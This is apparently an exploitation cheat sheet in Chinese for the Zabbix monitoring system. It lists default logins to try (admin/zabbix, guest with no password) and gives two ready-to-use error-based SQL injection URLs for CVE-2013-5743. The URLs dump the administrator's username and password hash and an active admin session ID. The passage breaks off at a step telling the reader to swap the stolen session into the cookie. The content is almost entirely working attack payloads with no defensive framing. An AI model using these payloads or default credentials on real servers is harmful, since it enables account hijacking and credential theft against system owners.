0x01 zabbix的默认账户与密码
默认口令 admin/zabbix
或者是guest/空 ,(系统内置账户)可以多试试
0x02 zabbix注入 CVE-2013-5743(影响版本 1.8.5-1.8.9)
前提guest账户可以登录
exp利用:
http://zabbix.server/zabbix/httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
可以直接爆出管理员账户和密码MD5值
也可以注入出管理员的session
http://zabbix.server/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29
用获取到的session替换cook